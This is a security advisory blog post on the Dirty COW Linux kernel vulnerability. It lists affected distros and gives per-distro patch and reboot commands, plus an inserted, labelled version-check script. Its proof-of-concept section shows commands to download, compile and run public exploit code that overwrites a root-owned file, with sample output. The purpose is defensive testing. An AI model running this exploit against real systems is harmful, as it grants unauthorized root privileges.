CVE-2016-5195 – Dirty Cow Vulnerability

Overview

Dirty COW is a new high-profile privilege escalation vulnerability in Linux, the latest in a series of branded bugs such as Heartbleed, Ghost and ShellShock. In this post I’ll give more details about this vulnerability and how to mitigate the risk to your systems.

Present in Linux kernel versions 2.6.22 and higher, the issue has existed since 2007. After its discovery by a security researcher named Phil Oester, it was fixed on Oct 18, 2016, which means that there’s a high probability that your Linux-running devices are vulnerable.

Description

The description from Red Hat’s CVE:

“A race condition was found in the way the Linux kernel’s memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the system.”

First, an attacker gains access to the machine. Second, the attacker runs a publicly available exploit (several exist). A successful attack results in the attacker gaining root privileges. The attack is not logged and will therefore pass undetected.

Patches are available for most Linux distros.

Vulnerable Linux distros (Common):

Your first concern should be to mitigate the bug on your servers, which probably have the most users and application packages. But you should also attend to network appliances and less common Linux distros such as CoreOS.

  1. Red Hat Enterprise Linux 7.x
  2. Red Hat Enterprise Linux 6.x
  3. Red Hat Enterprise Linux 5.x
  4. CentOS Linux 7.x
  5. CentOS Linux 6.x
  6. CentOS Linux 5.x
  7. Debian Linux wheezy
  8. Debian Linux jessie
  9. Debian Linux stretch
  10. Debian Linux sid
  11. Ubuntu Linux precise (LTS 12.04)
  12. Ubuntu Linux trusty
  13. Ubuntu Linux xenial (LTS 16.04)
  14. Ubuntu Linux yakkety
  15. Ubuntu Linux vivid/ubuntu-core
  16. SUSE Linux Enterprise 11 and 12.
  17. Amazon Linux AMI

Testing for a vulnerable kernel

Run the following command according to your distro:

$ uname -a

$ uname -mrs

Sample output:

Linux 3.13.0-95-generic x86_64

Fixing the issue

-Debian or Ubuntu Linux

$ sudo apt-get update && sudo apt-get upgrade && sudo apt-get dist-upgrade

$ sudo reboot

-RHEL / CentOS Linux 5.x/6.x/7.x

Red Hat is releasing the patches to the various versions gradually without supplying a deadline.
For the updated info please refer to: https://access.redhat.com/security/vulnerabilities/2706661

$ sudo yum update

$ sudo reboot

-SUSE Enterprise Linux or openSUSE Linux

To apply all needed patches to the system type:

# zypper patch

# reboot

-Amazon Linux AMI

The patched kernel’s version is: “kernel-4.4.23-31.54.amzn1.x86_64”.
To update the kernel:

# sudo yum update kernel

# reboot
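
The uname output above only helps when it is compared with the fixed release for the same distro, and every fix above ends with a reboot because the old kernel keeps running until then. The following is an added example, not part of the original post: it classifies a kernel release against the Amazon Linux fixed version quoted above. The function names are hypothetical, and the comparison is only meaningful within one distro's kernel stream, since distros backport the fix to older version numbers.

```sh
#!/bin/sh
# Added example (not from the original post): classify a kernel release
# against a known-fixed release from the same distro kernel stream.

# Fixed Amazon Linux kernel named in the post, without the "kernel-" prefix.
AMZN_FIXED="4.4.23-31.54.amzn1.x86_64"

# version_ge A B: succeeds when release A sorts at or after release B.
# Uses GNU sort -V (version sort), so 4.4.23 > 4.4.19 and 4.10 > 4.4.
version_ge() {
    newest=$(printf '%s\n%s\n' "$1" "$2" | sort -V | tail -n 1)
    [ "$newest" = "$1" ]
}

# kernel_status RUNNING FIXED [INSTALLED]
#   patched          running kernel is at or above the fixed release
#   reboot-required  fixed kernel is installed, but the old one is still running
#   vulnerable       neither running nor installed kernel has the fix
kernel_status() {
    running=$1
    fixed=$2
    installed=${3:-$1}
    if version_ge "$running" "$fixed"; then
        echo "patched"
    elif version_ge "$installed" "$fixed"; then
        echo "reboot-required"
    else
        echo "vulnerable"
    fi
}

# On an Amazon Linux host (INSTALLED is the newest kernel package on disk):
#   kernel_status "$(uname -r)" "$AMZN_FIXED" "$INSTALLED"
```
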

Proof of Concept exploit

The PoC helps you determine whether a less common Linux distribution is vulnerable or patched:

  • Download:

$ wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c

  • Create a target file as root:

$ sudo -s

# echo this is not a test > foo

  • Run the PoC as a normal user:

$ gcc -pthread dirtyc0w.c -o dirtyc0w

$ ./dirtyc0w foo m00000000000000000

mmap 56123000

madvise 0

procselfmem 1800000000

$ cat foo

m00000000000000000

Editor’s note:

I updated the post to include Amazon Linux AMI and the latest info from Red Hat.


References:

  1. https://access.redhat.com/security/cve/cve-2016-5195
  2. https://www.exploit-db.com/exploits/40611/
  3. https://arstechnica.com/security/2016/10/most-serious-linux-privilege-escalation-bug-ever-is-under-active-exploit/

Lahav Savir